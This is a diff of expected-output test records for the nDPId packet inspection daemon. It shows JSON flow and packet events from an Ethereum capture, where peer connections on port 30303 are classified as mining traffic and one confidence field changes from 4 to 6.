+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} 
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -298,19 +298,19 @@ 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
